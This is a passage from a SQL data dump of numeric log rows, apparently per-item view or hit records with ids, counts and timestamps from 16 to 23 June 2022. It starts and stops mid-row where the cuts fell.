12:23:32'),(53222,1728,1,'2022-06-16','2022-06-16 12:27:49'),(53223,87,1,'2022-06-16','2022-06-16 12:28:38'),(53224,76,1,'2022-06-16','2022-06-16 12:29:00'),(53225,87,1,'2022-06-16','2022-06-16 12:29:12'),(53226,1728,1,'2022-06-16','2022-06-16 12:29:14'),(53227,570,1,'2022-06-16','2022-06-16 12:38:06'),(53228,1737,1,'2022-06-16','2022-06-16 12:43:02'),(53229,72,1,'2022-06-16','2022-06-16 13:05:36'),(53230,4529,1,'2022-06-16','2022-06-16 13:15:07'),(53231,3263,1,'2022-06-16','2022-06-16 13:21:31'),(53232,84,1,'2022-06-16','2022-06-16 13:26:57'),(53233,3764,1,'2022-06-16','2022-06-16 13:34:30'),(53234,469,1,'2022-06-16','2022-06-16 13:40:37'),(53235,4524,1,'2022-06-16','2022-06-16 13:45:05'),(53236,4566,1,'2022-06-16','2022-06-16 13:46:10'),(53237,4709,1,'2022-06-16','2022-06-16 13:51:29'),(53238,3060,1,'2022-06-16','2022-06-16 13:56:56'),(53239,3226,1,'2022-06-16','2022-06-16 14:02:23'),(53240,2989,1,'2022-06-16','2022-06-16 14:13:15'),(53241,4454,1,'2022-06-16','2022-06-16 14:15:06'),(53242,1709,1,'2022-06-16','2022-06-16 14:29:35'),(53243,1598,1,'2022-06-16','2022-06-16 14:35:05'),(53244,2813,1,'2022-06-16','2022-06-16 15:00:19'),(53245,1600,1,'2022-06-16','2022-06-16 15:07:42'),(53246,1598,1,'2022-06-16','2022-06-16 15:13:31'),(53247,1600,1,'2022-06-16','2022-06-16 15:21:16'),(53248,2813,1,'2022-06-16','2022-06-16 15:41:49'),(53249,87,1,'2022-06-16','2022-06-16 15:51:54'),(53250,1606,1,'2022-06-16','2022-06-16 16:43:26'),(53251,2769,1,'2022-06-16','2022-06-16 18:39:14'),(53252,2801,1,'2022-06-16','2022-06-16 20:09:10'),(53253,477,1,'2022-06-16','2022-06-16 21:04:30'),(53254,3297,1,'2022-06-16','2022-06-16 21:13:29'),(53255,1586,1,'2022-06-16','2022-06-16 21:39:11'),(53256,335,1,'2022-06-16','2022-06-16 21:39:19'),(53257,3060,1,'2022-06-16','2022-06-16 21:58:29'),(53258,1598,1,'2022-06-16','2022-06-16 22:28:33'),(53259,4275,1,'2022-06-16','2022-06-16 22:43:29'),(53260,471,1,'2022-06-16','2022-06-16 23:17:41'),(53261,3774,1,'2022-06-17','2022-06-17 00:35:37'),(53262,72,1,'2022-06-17','2022-06-17 03:11:36'),(53263,1590,1,'2022-06-17','2022-06-17 03:17:28'),(53264,2704,1,'2022-06-17','2022-06-17 06:19:41'),(53265,2911,1,'2022-06-17','2022-06-17 07:45:02'),(53266,1598,1,'2022-06-17','2022-06-17 07:45:04'),(53267,0,1,'2022-06-17','2022-06-17 08:01:20'),(53268,4712,1,'2022-06-17','2022-06-17 08:08:04'),(53269,4323,1,'2022-06-17','2022-06-17 08:32:28'),(53270,1602,1,'2022-06-17','2022-06-17 08:54:56'),(53271,4457,1,'2022-06-17','2022-06-17 10:01:20'),(53272,4436,1,'2022-06-17','2022-06-17 10:02:30'),(53273,76,1,'2022-06-17','2022-06-17 10:18:27'),(53274,1602,1,'2022-06-17','2022-06-17 11:10:20'),(53275,1602,1,'2022-06-17','2022-06-17 11:18:08'),(53276,80,1,'2022-06-17','2022-06-17 11:20:42'),(53277,76,1,'2022-06-17','2022-06-17 11:21:34'),(53278,91,1,'2022-06-17','2022-06-17 11:23:13'),(53279,4612,1,'2022-06-17','2022-06-17 11:23:49'),(53280,4612,1,'2022-06-17','2022-06-17 11:23:49'),(53281,1872,1,'2022-06-17','2022-06-17 11:24:58'),(53282,1608,1,'2022-06-17','2022-06-17 11:50:22'),(53283,4498,1,'2022-06-17','2022-06-17 12:09:16'),(53284,3781,1,'2022-06-17','2022-06-17 12:10:59'),(53285,80,1,'2022-06-17','2022-06-17 12:11:49'),(53286,3781,1,'2022-06-17','2022-06-17 12:11:59'),(53287,72,1,'2022-06-17','2022-06-17 12:21:39'),(53288,84,1,'2022-06-17','2022-06-17 12:26:03'),(53289,3083,1,'2022-06-17','2022-06-17 12:26:39'),(53290,4457,1,'2022-06-17','2022-06-17 12:29:00'),(53291,1606,1,'2022-06-17','2022-06-17 12:46:24'),(53292,89,1,'2022-06-17','2022-06-17 13:14:14'),(53293,3764,1,'2022-06-17','2022-06-17 13:39:09'),(53294,68,1,'2022-06-17','2022-06-17 13:48:16'),(53295,76,1,'2022-06-17','2022-06-17 13:51:04'),(53296,108,1,'2022-06-17','2022-06-17 14:00:23'),(53297,68,1,'2022-06-17','2022-06-17 14:13:16'),(53298,1586,1,'2022-06-17','2022-06-17 14:22:54'),(53299,3041,1,'2022-06-17','2022-06-17 15:45:28'),(53300,2965,1,'2022-06-17','2022-06-17 16:01:50'),(53301,3752,1,'2022-06-17','2022-06-17 16:14:41'),(53302,2965,1,'2022-06-17','2022-06-17 16:31:26'),(53303,2769,1,'2022-06-17','2022-06-17 16:54:30'),(53304,1598,1,'2022-06-17','2022-06-17 17:17:01'),(53305,468,1,'2022-06-17','2022-06-17 18:52:28'),(53306,1610,1,'2022-06-17','2022-06-17 20:04:19'),(53307,4412,1,'2022-06-17','2022-06-17 20:11:27'),(53308,91,1,'2022-06-17','2022-06-17 21:08:46'),(53309,72,1,'2022-06-17','2022-06-17 21:24:46'),(53310,4498,1,'2022-06-17','2022-06-17 21:39:07'),(53311,1544,1,'2022-06-17','2022-06-17 21:48:07'),(53312,1586,1,'2022-06-17','2022-06-17 22:35:41'),(53313,3072,1,'2022-06-17','2022-06-17 22:44:52'),(53314,1703,1,'2022-06-17','2022-06-17 23:16:21'),(53315,1544,1,'2022-06-17','2022-06-17 23:18:06'),(53316,1594,1,'2022-06-17','2022-06-17 23:29:53'),(53317,4697,1,'2022-06-17','2022-06-17 23:58:21'),(53318,4697,1,'2022-06-17','2022-06-17 23:58:58'),(53319,476,1,'2022-06-18','2022-06-18 01:27:06'),(53320,2617,1,'2022-06-18','2022-06-18 04:27:06'),(53321,1722,1,'2022-06-18','2022-06-18 04:43:26'),(53322,1722,1,'2022-06-18','2022-06-18 04:43:52'),(53323,1722,1,'2022-06-18','2022-06-18 04:44:31'),(53324,1722,1,'2022-06-18','2022-06-18 04:46:57'),(53325,72,1,'2022-06-18','2022-06-18 05:23:12'),(53326,1544,1,'2022-06-18','2022-06-18 06:44:20'),(53327,1544,1,'2022-06-18','2022-06-18 07:29:22'),(53328,467,1,'2022-06-18','2022-06-18 08:14:18'),(53329,1872,1,'2022-06-18','2022-06-18 08:57:23'),(53330,467,1,'2022-06-18','2022-06-18 08:59:21'),(53331,1586,1,'2022-06-18','2022-06-18 09:44:54'),(53332,1586,1,'2022-06-18','2022-06-18 09:47:32'),(53333,468,1,'2022-06-18','2022-06-18 09:50:31'),(53334,2457,1,'2022-06-18','2022-06-18 09:56:41'),(53335,1594,1,'2022-06-18','2022-06-18 10:08:31'),(53336,1586,1,'2022-06-18','2022-06-18 10:08:34'),(53337,1586,1,'2022-06-18','2022-06-18 10:09:10'),(53338,1722,1,'2022-06-18','2022-06-18 10:09:29'),(53339,2801,1,'2022-06-18','2022-06-18 10:35:27'),(53340,1586,1,'2022-06-18','2022-06-18 11:24:44'),(53341,72,1,'2022-06-18','2022-06-18 12:54:24'),(53342,2609,1,'2022-06-18','2022-06-18 13:41:57'),(53343,1586,1,'2022-06-18','2022-06-18 13:44:06'),(53344,2159,1,'2022-06-18','2022-06-18 14:03:34'),(53345,4416,1,'2022-06-18','2022-06-18 14:26:56'),(53346,2457,1,'2022-06-18','2022-06-18 14:26:58'),(53347,3087,1,'2022-06-18','2022-06-18 16:52:52'),(53348,1582,1,'2022-06-18','2022-06-18 17:34:03'),(53349,484,1,'2022-06-18','2022-06-18 18:29:56'),(53350,3781,1,'2022-06-18','2022-06-18 18:32:45'),(53351,479,1,'2022-06-18','2022-06-18 20:17:03'),(53352,72,1,'2022-06-18','2022-06-18 20:46:14'),(53353,91,1,'2022-06-18','2022-06-18 22:50:48'),(53354,1588,1,'2022-06-19','2022-06-19 00:42:06'),(53355,4416,1,'2022-06-19','2022-06-19 01:00:21'),(53356,4416,1,'2022-06-19','2022-06-19 01:02:51'),(53357,4428,1,'2022-06-19','2022-06-19 02:30:23'),(53358,1608,1,'2022-06-19','2022-06-19 03:15:28'),(53359,72,1,'2022-06-19','2022-06-19 03:55:27'),(53360,3498,1,'2022-06-19','2022-06-19 04:33:25'),(53361,4622,1,'2022-06-19','2022-06-19 04:42:56'),(53362,1582,1,'2022-06-19','2022-06-19 04:46:52'),(53363,89,1,'2022-06-19','2022-06-19 04:57:05'),(53364,2457,1,'2022-06-19','2022-06-19 04:57:52'),(53365,3124,1,'2022-06-19','2022-06-19 05:09:26'),(53366,4404,1,'2022-06-19','2022-06-19 06:03:25'),(53367,3124,1,'2022-06-19','2022-06-19 06:08:48'),(53368,76,1,'2022-06-19','2022-06-19 06:33:17'),(53369,1606,1,'2022-06-19','2022-06-19 06:40:25'),(53370,4697,1,'2022-06-19','2022-06-19 07:37:44'),(53371,4436,1,'2022-06-19','2022-06-19 07:54:10'),(53372,484,1,'2022-06-19','2022-06-19 08:01:33'),(53373,3109,1,'2022-06-19','2022-06-19 08:03:40'),(53374,3534,1,'2022-06-19','2022-06-19 08:05:13'),(53375,3117,1,'2022-06-19','2022-06-19 08:10:44'),(53376,3307,1,'2022-06-19','2022-06-19 08:27:44'),(53377,2769,1,'2022-06-19','2022-06-19 08:45:10'),(53378,3731,1,'2022-06-19','2022-06-19 09:30:11'),(53379,89,1,'2022-06-19','2022-06-19 09:35:25'),(53380,2804,1,'2022-06-19','2022-06-19 09:40:27'),(53381,3777,1,'2022-06-19','2022-06-19 09:41:44'),(53382,1718,1,'2022-06-19','2022-06-19 11:07:31'),(53383,1718,1,'2022-06-19','2022-06-19 11:07:45'),(53384,1718,1,'2022-06-19','2022-06-19 11:08:02'),(53385,91,1,'2022-06-19','2022-06-19 11:10:30'),(53386,4608,1,'2022-06-19','2022-06-19 11:11:58'),(53387,4608,1,'2022-06-19','2022-06-19 11:12:25'),(53388,72,1,'2022-06-19','2022-06-19 11:42:39'),(53389,1718,1,'2022-06-19','2022-06-19 11:45:12'),(53390,1608,1,'2022-06-19','2022-06-19 12:32:13'),(53391,4697,1,'2022-06-19','2022-06-19 12:57:45'),(53392,2775,1,'2022-06-19','2022-06-19 13:15:10'),(53393,108,1,'2022-06-19','2022-06-19 13:31:33'),(53394,2457,1,'2022-06-19','2022-06-19 14:15:14'),(53395,76,1,'2022-06-19','2022-06-19 14:45:12'),(53396,1610,1,'2022-06-19','2022-06-19 16:33:25'),(53397,1610,1,'2022-06-19','2022-06-19 16:33:27'),(53398,1610,1,'2022-06-19','2022-06-19 16:35:51'),(53399,72,1,'2022-06-19','2022-06-19 17:45:13'),(53400,1594,1,'2022-06-19','2022-06-19 17:52:48'),(53401,3781,1,'2022-06-19','2022-06-19 18:11:51'),(53402,4448,1,'2022-06-19','2022-06-19 18:30:13'),(53403,1588,1,'2022-06-19','2022-06-19 18:35:34'),(53404,72,1,'2022-06-19','2022-06-19 18:38:46'),(53405,472,1,'2022-06-19','2022-06-19 21:19:33'),(53406,472,1,'2022-06-19','2022-06-19 22:04:32'),(53407,4691,1,'2022-06-19','2022-06-19 22:34:30'),(53408,3257,1,'2022-06-19','2022-06-19 23:38:37'),(53409,487,1,'2022-06-19','2022-06-19 23:45:37'),(53410,470,1,'2022-06-20','2022-06-20 00:46:47'),(53411,2309,1,'2022-06-20','2022-06-20 01:15:11'),(53412,473,1,'2022-06-20','2022-06-20 01:33:28'),(53413,72,1,'2022-06-20','2022-06-20 01:35:50'),(53414,474,1,'2022-06-20','2022-06-20 01:58:50'),(53415,468,1,'2022-06-20','2022-06-20 02:39:19'),(53416,4520,1,'2022-06-20','2022-06-20 04:37:42'),(53417,476,1,'2022-06-20','2022-06-20 06:08:46'),(53418,2804,1,'2022-06-20','2022-06-20 09:07:35'),(53419,74,1,'2022-06-20','2022-06-20 10:06:26'),(53420,72,1,'2022-06-20','2022-06-20 10:40:08'),(53421,3030,1,'2022-06-20','2022-06-20 11:47:49'),(53422,68,1,'2022-06-20','2022-06-20 12:00:49'),(53423,2178,1,'2022-06-20','2022-06-20 12:05:59'),(53424,2178,1,'2022-06-20','2022-06-20 12:06:14'),(53425,2178,1,'2022-06-20','2022-06-20 12:06:43'),(53426,68,1,'2022-06-20','2022-06-20 12:07:43'),(53427,2178,1,'2022-06-20','2022-06-20 12:08:36'),(53428,1602,1,'2022-06-20','2022-06-20 12:37:08'),(53429,1774,1,'2022-06-20','2022-06-20 13:07:17'),(53430,2309,1,'2022-06-20','2022-06-20 13:08:32'),(53431,2309,1,'2022-06-20','2022-06-20 13:08:55'),(53432,89,1,'2022-06-20','2022-06-20 13:13:32'),(53433,89,1,'2022-06-20','2022-06-20 13:14:53'),(53434,4301,1,'2022-06-20','2022-06-20 13:16:16'),(53435,89,1,'2022-06-20','2022-06-20 13:19:05'),(53436,89,1,'2022-06-20','2022-06-20 13:19:12'),(53437,68,1,'2022-06-20','2022-06-20 13:19:39'),(53438,89,1,'2022-06-20','2022-06-20 13:19:51'),(53439,1584,1,'2022-06-20','2022-06-20 13:20:04'),(53440,89,1,'2022-06-20','2022-06-20 13:26:24'),(53441,1586,1,'2022-06-20','2022-06-20 13:26:32'),(53442,89,1,'2022-06-20','2022-06-20 13:29:32'),(53443,1590,1,'2022-06-20','2022-06-20 13:29:46'),(53444,89,1,'2022-06-20','2022-06-20 13:30:06'),(53445,1588,1,'2022-06-20','2022-06-20 13:30:10'),(53446,470,1,'2022-06-20','2022-06-20 14:38:41'),(53447,4338,1,'2022-06-20','2022-06-20 15:52:13'),(53448,1610,1,'2022-06-20','2022-06-20 17:08:15'),(53449,4457,1,'2022-06-20','2022-06-20 17:58:32'),(53450,3727,1,'2022-06-20','2022-06-20 18:25:29'),(53451,3727,1,'2022-06-20','2022-06-20 18:25:54'),(53452,4712,1,'2022-06-20','2022-06-20 18:26:41'),(53453,3727,1,'2022-06-20','2022-06-20 18:27:00'),(53454,72,1,'2022-06-20','2022-06-20 19:26:20'),(53455,3090,1,'2022-06-20','2022-06-20 20:51:36'),(53456,4432,1,'2022-06-20','2022-06-20 21:32:12'),(53457,4542,1,'2022-06-20','2022-06-20 22:46:21'),(53458,72,1,'2022-06-21','2022-06-21 01:38:15'),(53459,1544,1,'2022-06-21','2022-06-21 02:41:42'),(53460,1610,1,'2022-06-21','2022-06-21 02:45:11'),(53461,1610,1,'2022-06-21','2022-06-21 04:00:11'),(53462,72,1,'2022-06-21','2022-06-21 04:21:11'),(53463,1600,1,'2022-06-21','2022-06-21 07:38:31'),(53464,1718,1,'2022-06-21','2022-06-21 09:26:48'),(53465,1544,1,'2022-06-21','2022-06-21 09:38:53'),(53466,1606,1,'2022-06-21','2022-06-21 09:48:39'),(53467,1614,1,'2022-06-21','2022-06-21 09:52:19'),(53468,80,1,'2022-06-21','2022-06-21 09:58:45'),(53469,1614,1,'2022-06-21','2022-06-21 10:00:33'),(53470,3090,1,'2022-06-21','2022-06-21 10:26:00'),(53471,1614,1,'2022-06-21','2022-06-21 10:41:10'),(53472,1588,1,'2022-06-21','2022-06-21 11:00:12'),(53473,470,1,'2022-06-21','2022-06-21 11:19:21'),(53474,4612,1,'2022-06-21','2022-06-21 11:59:12'),(53475,72,1,'2022-06-21','2022-06-21 12:08:47'),(53476,2809,1,'2022-06-21','2022-06-21 13:10:50'),(53477,1596,1,'2022-06-21','2022-06-21 13:48:20'),(53478,1722,1,'2022-06-21','2022-06-21 13:52:20'),(53479,3102,1,'2022-06-21','2022-06-21 13:52:28'),(53480,91,1,'2022-06-21','2022-06-21 13:54:48'),(53481,4608,1,'2022-06-21','2022-06-21 13:57:51'),(53482,4412,1,'2022-06-21','2022-06-21 15:13:28'),(53483,4694,1,'2022-06-21','2022-06-21 15:16:56'),(53484,4412,1,'2022-06-21','2022-06-21 15:33:37'),(53485,2704,1,'2022-06-21','2022-06-21 15:34:57'),(53486,1600,1,'2022-06-21','2022-06-21 16:02:46'),(53487,68,1,'2022-06-21','2022-06-21 16:09:02'),(53488,1588,1,'2022-06-21','2022-06-21 17:17:45'),(53489,1718,1,'2022-06-21','2022-06-21 17:31:48'),(53490,4694,1,'2022-06-21','2022-06-21 18:01:57'),(53491,3307,1,'2022-06-21','2022-06-21 18:31:46'),(53492,108,1,'2022-06-21','2022-06-21 18:51:48'),(53493,1872,1,'2022-06-21','2022-06-21 19:07:16'),(53494,72,1,'2022-06-21','2022-06-21 19:07:43'),(53495,3752,1,'2022-06-21','2022-06-21 19:38:58'),(53496,3664,1,'2022-06-21','2022-06-21 20:15:10'),(53497,1872,1,'2022-06-21','2022-06-21 21:08:56'),(53498,1726,1,'2022-06-21','2022-06-21 21:45:06'),(53499,1596,1,'2022-06-21','2022-06-21 21:59:52'),(53500,2911,1,'2022-06-21','2022-06-21 22:00:09'),(53501,1722,1,'2022-06-21','2022-06-21 22:23:53'),(53502,3691,1,'2022-06-21','2022-06-21 22:25:30'),(53503,488,1,'2022-06-21','2022-06-21 23:29:11'),(53504,1600,1,'2022-06-22','2022-06-22 01:46:48'),(53505,3691,1,'2022-06-22','2022-06-22 02:31:48'),(53506,72,1,'2022-06-22','2022-06-22 02:42:32'),(53507,3090,1,'2022-06-22','2022-06-22 03:05:23'),(53508,1872,1,'2022-06-22','2022-06-22 04:08:54'),(53509,3752,1,'2022-06-22','2022-06-22 04:38:57'),(53510,1582,1,'2022-06-22','2022-06-22 05:39:05'),(53511,2503,1,'2022-06-22','2022-06-22 08:38:57'),(53512,1870,1,'2022-06-22','2022-06-22 08:52:31'),(53513,3781,1,'2022-06-22','2022-06-22 08:56:46'),(53514,108,1,'2022-06-22','2022-06-22 09:02:35'),(53515,1594,1,'2022-06-22','2022-06-22 09:03:50'),(53516,4612,1,'2022-06-22','2022-06-22 09:33:16'),(53517,72,1,'2022-06-22','2022-06-22 09:38:21'),(53518,72,1,'2022-06-22','2022-06-22 09:44:10'),(53519,4738,1,'2022-06-22','2022-06-22 09:44:24'),(53520,4738,1,'2022-06-22','2022-06-22 09:52:43'),(53521,4738,1,'2022-06-22','2022-06-22 09:57:53'),(53522,4738,1,'2022-06-22','2022-06-22 09:58:16'),(53523,4738,1,'2022-06-22','2022-06-22 09:59:16'),(53524,4738,1,'2022-06-22','2022-06-22 09:59:40'),(53525,2904,1,'2022-06-22','2022-06-22 10:00:35'),(53526,4738,1,'2022-06-22','2022-06-22 10:01:12'),(53527,2904,1,'2022-06-22','2022-06-22 10:01:45'),(53528,4738,1,'2022-06-22','2022-06-22 10:02:42'),(53529,4738,1,'2022-06-22','2022-06-22 10:03:20'),(53530,4738,1,'2022-06-22','2022-06-22 10:04:09'),(53531,4738,1,'2022-06-22','2022-06-22 10:10:07'),(53532,4738,1,'2022-06-22','2022-06-22 10:10:14'),(53533,4738,1,'2022-06-22','2022-06-22 10:10:57'),(53534,4738,1,'2022-06-22','2022-06-22 10:11:02'),(53535,4738,1,'2022-06-22','2022-06-22 10:11:46'),(53536,4738,1,'2022-06-22','2022-06-22 10:14:47'),(53537,4738,1,'2022-06-22','2022-06-22 10:17:17'),(53538,4738,1,'2022-06-22','2022-06-22 10:21:30'),(53539,4738,1,'2022-06-22','2022-06-22 10:21:34'),(53540,4738,1,'2022-06-22','2022-06-22 10:21:37'),(53541,4738,1,'2022-06-22','2022-06-22 10:21:40'),(53542,4738,1,'2022-06-22','2022-06-22 10:24:17'),(53543,4738,1,'2022-06-22','2022-06-22 10:28:26'),(53544,4738,1,'2022-06-22','2022-06-22 10:31:45'),(53545,72,1,'2022-06-22','2022-06-22 10:42:24'),(53546,4738,1,'2022-06-22','2022-06-22 10:42:41'),(53547,4738,1,'2022-06-22','2022-06-22 10:42:42'),(53548,4722,1,'2022-06-22','2022-06-22 10:53:53'),(53549,4722,1,'2022-06-22','2022-06-22 11:01:57'),(53550,4738,1,'2022-06-22','2022-06-22 11:10:46'),(53551,4738,1,'2022-06-22','2022-06-22 11:10:47'),(53552,4738,1,'2022-06-22','2022-06-22 11:11:58'),(53553,4750,1,'2022-06-22','2022-06-22 11:12:34'),(53554,4747,1,'2022-06-22','2022-06-22 11:12:37'),(53555,4756,1,'2022-06-22','2022-06-22 11:12:49'),(53556,4753,1,'2022-06-22','2022-06-22 11:12:52'),(53557,4741,1,'2022-06-22','2022-06-22 11:13:16'),(53558,4759,1,'2022-06-22','2022-06-22 11:13:20'),(53559,4744,1,'2022-06-22','2022-06-22 11:13:48'),(53560,4738,1,'2022-06-22','2022-06-22 11:24:50'),(53561,4738,1,'2022-06-22','2022-06-22 11:26:11'),(53562,4738,1,'2022-06-22','2022-06-22 11:27:46'),(53563,4738,1,'2022-06-22','2022-06-22 11:29:50'),(53564,4738,1,'2022-06-22','2022-06-22 11:29:58'),(53565,4738,1,'2022-06-22','2022-06-22 11:31:15'),(53566,4738,1,'2022-06-22','2022-06-22 11:31:21'),(53567,4738,1,'2022-06-22','2022-06-22 11:31:39'),(53568,4738,1,'2022-06-22','2022-06-22 11:31:42'),(53569,4738,1,'2022-06-22','2022-06-22 11:32:57'),(53570,4738,1,'2022-06-22','2022-06-22 11:35:04'),(53571,4738,1,'2022-06-22','2022-06-22 11:36:57'),(53572,4738,1,'2022-06-22','2022-06-22 11:37:36'),(53573,4738,1,'2022-06-22','2022-06-22 11:38:40'),(53574,4612,1,'2022-06-22','2022-06-22 11:39:15'),(53575,4738,1,'2022-06-22','2022-06-22 11:40:44'),(53576,4738,1,'2022-06-22','2022-06-22 11:43:43'),(53577,4738,1,'2022-06-22','2022-06-22 11:44:03'),(53578,4738,1,'2022-06-22','2022-06-22 11:46:36'),(53579,4738,1,'2022-06-22','2022-06-22 11:47:41'),(53580,4738,1,'2022-06-22','2022-06-22 11:48:24'),(53581,4738,1,'2022-06-22','2022-06-22 11:48:48'),(53582,4738,1,'2022-06-22','2022-06-22 11:51:53'),(53583,4412,1,'2022-06-22','2022-06-22 11:53:18'),(53584,4738,1,'2022-06-22','2022-06-22 11:56:52'),(53585,4738,1,'2022-06-22','2022-06-22 11:56:54'),(53586,4738,1,'2022-06-22','2022-06-22 11:57:20'),(53587,4738,1,'2022-06-22','2022-06-22 11:57:21'),(53588,4738,1,'2022-06-22','2022-06-22 11:59:24'),(53589,4738,1,'2022-06-22','2022-06-22 11:59:46'),(53590,4738,1,'2022-06-22','2022-06-22 11:59:56'),(53591,4738,1,'2022-06-22','2022-06-22 12:03:24'),(53592,2904,1,'2022-06-22','2022-06-22 12:04:44'),(53593,91,1,'2022-06-22','2022-06-22 12:09:04'),(53594,2165,1,'2022-06-22','2022-06-22 12:10:11'),(53595,2165,1,'2022-06-22','2022-06-22 12:10:15'),(53596,4738,1,'2022-06-22','2022-06-22 12:16:18'),(53597,89,1,'2022-06-22','2022-06-22 12:16:22'),(53598,1582,1,'2022-06-22','2022-06-22 12:16:39'),(53599,4765,1,'2022-06-22','2022-06-22 12:18:26'),(53600,4771,1,'2022-06-22','2022-06-22 12:18:40'),(53601,4765,1,'2022-06-22','2022-06-22 12:18:42'),(53602,4768,1,'2022-06-22','2022-06-22 12:18:47'),(53603,4762,1,'2022-06-22','2022-06-22 12:19:16'),(53604,4771,1,'2022-06-22','2022-06-22 12:19:18'),(53605,4771,1,'2022-06-22','2022-06-22 12:19:19'),(53606,4762,1,'2022-06-22','2022-06-22 12:19:41'),(53607,4768,1,'2022-06-22','2022-06-22 12:20:42'),(53608,4768,1,'2022-06-22','2022-06-22 12:20:43'),(53609,4738,1,'2022-06-22','2022-06-22 12:29:00'),(53610,3764,1,'2022-06-22','2022-06-22 12:47:53'),(53611,4738,1,'2022-06-22','2022-06-22 12:55:06'),(53612,72,1,'2022-06-22','2022-06-22 12:57:58'),(53613,4738,1,'2022-06-22','2022-06-22 13:13:50'),(53614,4738,1,'2022-06-22','2022-06-22 13:15:03'),(53615,4738,1,'2022-06-22','2022-06-22 13:18:06'),(53616,4738,1,'2022-06-22','2022-06-22 13:19:32'),(53617,80,1,'2022-06-22','2022-06-22 13:19:43'),(53618,4738,1,'2022-06-22','2022-06-22 13:21:40'),(53619,4738,1,'2022-06-22','2022-06-22 13:22:57'),(53620,4738,1,'2022-06-22','2022-06-22 13:42:48'),(53621,4738,1,'2022-06-22','2022-06-22 13:47:32'),(53622,4738,1,'2022-06-22','2022-06-22 13:56:02'),(53623,4738,1,'2022-06-22','2022-06-22 14:01:54'),(53624,4738,1,'2022-06-22','2022-06-22 14:02:19'),(53625,4738,1,'2022-06-22','2022-06-22 14:16:06'),(53626,4457,1,'2022-06-22','2022-06-22 14:33:38'),(53627,1582,1,'2022-06-22','2022-06-22 14:49:42'),(53628,4738,1,'2022-06-22','2022-06-22 14:53:21'),(53629,4738,1,'2022-06-22','2022-06-22 15:09:48'),(53630,4738,1,'2022-06-22','2022-06-22 15:11:20'),(53631,74,1,'2022-06-22','2022-06-22 15:13:12'),(53632,80,1,'2022-06-22','2022-06-22 15:16:12'),(53633,74,1,'2022-06-22','2022-06-22 15:17:01'),(53634,2503,1,'2022-06-22','2022-06-22 15:17:13'),(53635,4762,1,'2022-06-22','2022-06-22 15:19:19'),(53636,4738,1,'2022-06-22','2022-06-22 15:34:41'),(53637,4738,1,'2022-06-22','2022-06-22 15:35:23'),(53638,4738,1,'2022-06-22','2022-06-22 15:47:41'),(53639,4738,1,'2022-06-22','2022-06-22 16:00:32'),(53640,4738,1,'2022-06-22','2022-06-22 16:05:52'),(53641,4738,1,'2022-06-22','2022-06-22 16:30:40'),(53642,4738,1,'2022-06-22','2022-06-22 16:35:44'),(53643,4738,1,'2022-06-22','2022-06-22 16:42:32'),(53644,76,1,'2022-06-22','2022-06-22 16:43:10'),(53645,4738,1,'2022-06-22','2022-06-22 16:43:22'),(53646,4738,1,'2022-06-22','2022-06-22 17:07:30'),(53647,4738,1,'2022-06-22','2022-06-22 17:15:29'),(53648,4612,1,'2022-06-22','2022-06-22 17:20:45'),(53649,2297,1,'2022-06-22','2022-06-22 17:20:49'),(53650,4612,1,'2022-06-22','2022-06-22 17:22:41'),(53651,4444,1,'2022-06-22','2022-06-22 17:49:47'),(53652,1582,1,'2022-06-22','2022-06-22 18:09:12'),(53653,87,1,'2022-06-22','2022-06-22 18:11:21'),(53654,87,1,'2022-06-22','2022-06-22 18:18:06'),(53655,4412,1,'2022-06-22','2022-06-22 18:22:51'),(53656,4733,1,'2022-06-22','2022-06-22 19:21:39'),(53657,72,1,'2022-06-22','2022-06-22 19:38:34'),(53658,1614,1,'2022-06-22','2022-06-22 19:38:49'),(53659,4738,1,'2022-06-22','2022-06-22 19:44:04'),(53660,1614,1,'2022-06-22','2022-06-22 19:55:12'),(53661,4738,1,'2022-06-22','2022-06-22 20:11:26'),(53662,4738,1,'2022-06-22','2022-06-22 20:13:10'),(53663,4738,1,'2022-06-22','2022-06-22 20:13:43'),(53664,4738,1,'2022-06-22','2022-06-22 20:16:35'),(53665,87,1,'2022-06-22','2022-06-22 20:44:37'),(53666,4738,1,'2022-06-22','2022-06-22 20:53:31'),(53667,4738,1,'2022-06-22','2022-06-22 20:54:50'),(53668,4738,1,'2022-06-22','2022-06-22 21:01:51'),(53669,4738,1,'2022-06-22','2022-06-22 21:02:31'),(53670,4738,1,'2022-06-22','2022-06-22 21:20:47'),(53671,4332,1,'2022-06-22','2022-06-22 21:34:44'),(53672,570,1,'2022-06-22','2022-06-22 22:16:27'),(53673,4738,1,'2022-06-22','2022-06-22 23:03:21'),(53674,4738,1,'2022-06-22','2022-06-22 23:04:11'),(53675,4738,1,'2022-06-22','2022-06-22 23:05:06'),(53676,4738,1,'2022-06-22','2022-06-22 23:15:27'),(53677,68,1,'2022-06-22','2022-06-22 23:23:22'),(53678,80,1,'2022-06-22','2022-06-22 23:30:45'),(53679,335,1,'2022-06-22','2022-06-22 23:35:08'),(53680,4762,1,'2022-06-22','2022-06-22 23:39:01'),(53681,1582,1,'2022-06-22','2022-06-22 23:54:04'),(53682,4756,1,'2022-06-23','2022-06-23 02:23:20'),(53683,4756,1,'2022-06-23','2022-06-23 02:34:08'),(53684,4396,1,'2022-06-23','2022-06-23 02:53:57'),(53685,1586,1,'2022-06-23','2022-06-23 03:03:02'),(53686,4738,1,'2022-06-23','2022-06-23 03:37:53'),(53687,2751,1,'2022-06-23','2022-06-23 04:29:17'),(53688,72,1,'2022-06-23','2022-06-23 04:49:19'),(53689,469,1,'2022-06-23','2022-06-23 05:21:53'),(53690,3251,1,'2022-06-23','2022-06-23 06:40:46'),(53691,4612,1,'2022-06-23','2022-06-23 07:52:27'),(53692,1582,1,'2022-06-23','2022-06-23 08:48:04'),(53693,570,1,'2022-06-23','2022-06-23 08:48:07'),(53694,3090,1,'2022-06-23','2022-06-23 09:03:18'),(53695,1602,1,'2022-06-23','2022-06-23 09:33:07'),(53696,1592,1,'2022-06-23','2022-06-23 09:33:21'),(53697,4738,1,'2022-06-23','2022-06-23 09:34:45'),(53698,4738,1,'2022-06-23','2022-06-23 09:35:04'),(53699,4753,1,'2022-06-23','2022-06-23 09:51:20'),(53700,4744,1,'2022-06-23','2022-06-23 10:14:41'),(53701,3175,1,'2022-06-23','2022-06-23 10:18:06'),(53702,2801,1,'2022-06-23','2022-06-23 10:25:01'),(53703,4738,1,'2022-06-23','2022-06-23 10:26:16'),(53704,4335,1,'2022-06-23','2022-06-23 10:43:10'),(53705,3724,1,'2022-06-23','2022-06-23 10:48:48'),(53706,2813,1,'2022-06-23','2022-06-23 10:56:21'),(53707,4744,1,'2022-06-23','2022-06-23 11:21:39'),(53708,4738,1,'2022-06-23','2022-06-23 